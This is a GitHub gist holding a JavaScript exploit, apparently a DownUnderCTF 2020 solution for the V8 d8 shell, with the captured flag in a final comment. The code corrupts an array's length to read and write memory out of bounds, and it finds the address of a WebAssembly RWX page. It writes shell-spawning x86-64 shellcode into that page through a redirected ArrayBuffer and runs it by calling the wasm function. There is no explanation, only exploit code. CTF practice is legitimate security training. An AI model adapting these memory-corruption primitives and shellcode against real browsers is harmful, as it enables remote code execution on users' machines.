Created
September 19, 2020 13:48
-
-
Save vngkv123/ad070002d745897c3c7d6966be911651 to your computer and use it in GitHub Desktop.
d8ctf 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let u32 = new Uint32Array(2); | |
| let f64 = new Float64Array(u32.buffer); | |
| function u2d(l, h) { | |
| u32[0] = l; | |
| u32[1] = h; | |
| return f64[0]; | |
| } | |
| function d2u(v) { | |
| f64[0] = v; | |
| return u32; | |
| } | |
| function hex(l, h) { | |
| return "0x" + h.toString(16) + l.toString(16).padStart(8, 0); | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x100; i++) { | |
| new ArrayBuffer(0x100000); | |
| } | |
| } | |
| let shellcode = [0xbb48c031, 0x91969dd1, 0xff978cd0, 0x53dbf748, 0x52995f54, 0xb05e5457, 0x50f3b] | |
| let wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 7, 1, 96, 2, 127, 127, 1, 127, 3, 2, 1, 0, 4, 4, 1, 112, 0, 0, 5, 3, 1, 0, 1, 7, 21, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 8, 95, 90, 51, 97, 100, 100, 105, 105, 0, 0, 10, 9, 1, 7, 0, 32, 1, 32, 0, 106, 11]); | |
| let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {}); | |
| let f = wasm_mod.exports._Z3addii; | |
| let arr = [u2d(0x08042a31, 0x41414141), u2d(0x42424242, 0x42424242)]; | |
| arr = arr.slice(0); | |
| arrays = []; | |
| let contiguous = [{}, 1, 1.1]; | |
| let double_map = d2u(arr[2]); | |
| let element = d2u(arr[3]); | |
| arr[3] = u2d(element[0] + 0x18, element[1]); | |
| arr[0] = u2d(element[0], 0x400); | |
| let victim = [ | |
| u2d(0x13381338, 0x13381338), | |
| u2d(0x13381338, 0x13381338), | |
| u2d(0x13381338, 0x13381338), | |
| u2d(0x13381338, 0x13381338), | |
| u2d(0x13381338, 0x13381338), | |
| u2d(0x13381338, 0x13381338) | |
| ]; | |
| let ab = new ArrayBuffer(0x1337); | |
| for (let i = 0; i < 0x100; i++) { | |
| arrays.push([ | |
| u2d(0xd0d00000 + i, 0xdadadada), | |
| u2d(0xd0d00000 + i, 0xdadadada), | |
| f, | |
| f | |
| ]); | |
| } | |
| let victim_index = -1; | |
| let ab_index = -1; | |
| for (let i = 0; i < arr.length; i++) { | |
| if (ab_index != -1 && victim_index != -1) { | |
| break; | |
| } | |
| t = d2u(arr[i]); | |
| if (ab_index == -1 && t[1] == 0x1337) { | |
| console.log("[-] AB Found : " + i); | |
| ab_index = i; | |
| continue; | |
| } | |
| if (victim_index == -1 && t[1] == 0xc && d2u(arr[i + 1])[1] == 0x13381338) { | |
| console.log("[-] VICTIM Found : " + i); | |
| victim_index = i; | |
| continue; | |
| } | |
| } | |
| let ab_save_hi = d2u(arr[ab_index + 2])[1]; | |
| let wasm_addr = d2u(arr[64]); | |
| arr[victim_index] = u2d(wasm_addr[0] - 4 - 0x100, 0x1000); | |
| let rwx = d2u(victim[6]); | |
| console.log("rwx : " + hex(rwx[0], rwx[1])); | |
| let rwx_lo = rwx[0]; | |
| let rwx_hi = rwx[1]; | |
| arr[ab_index + 1] = u2d(0, rwx_lo); | |
| arr[ab_index + 2] = u2d(rwx_hi, ab_save_hi); | |
| let dv = new DataView(ab); | |
| for (let i = 0; i < shellcode.length; i++) { | |
| dv.setUint32(i * 4, shellcode[i], true); | |
| } | |
| f(); | |
| // DUCTF{y0u_4r3_a_futUR3_br0ws3r_pwn_pr0d1gy!!} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment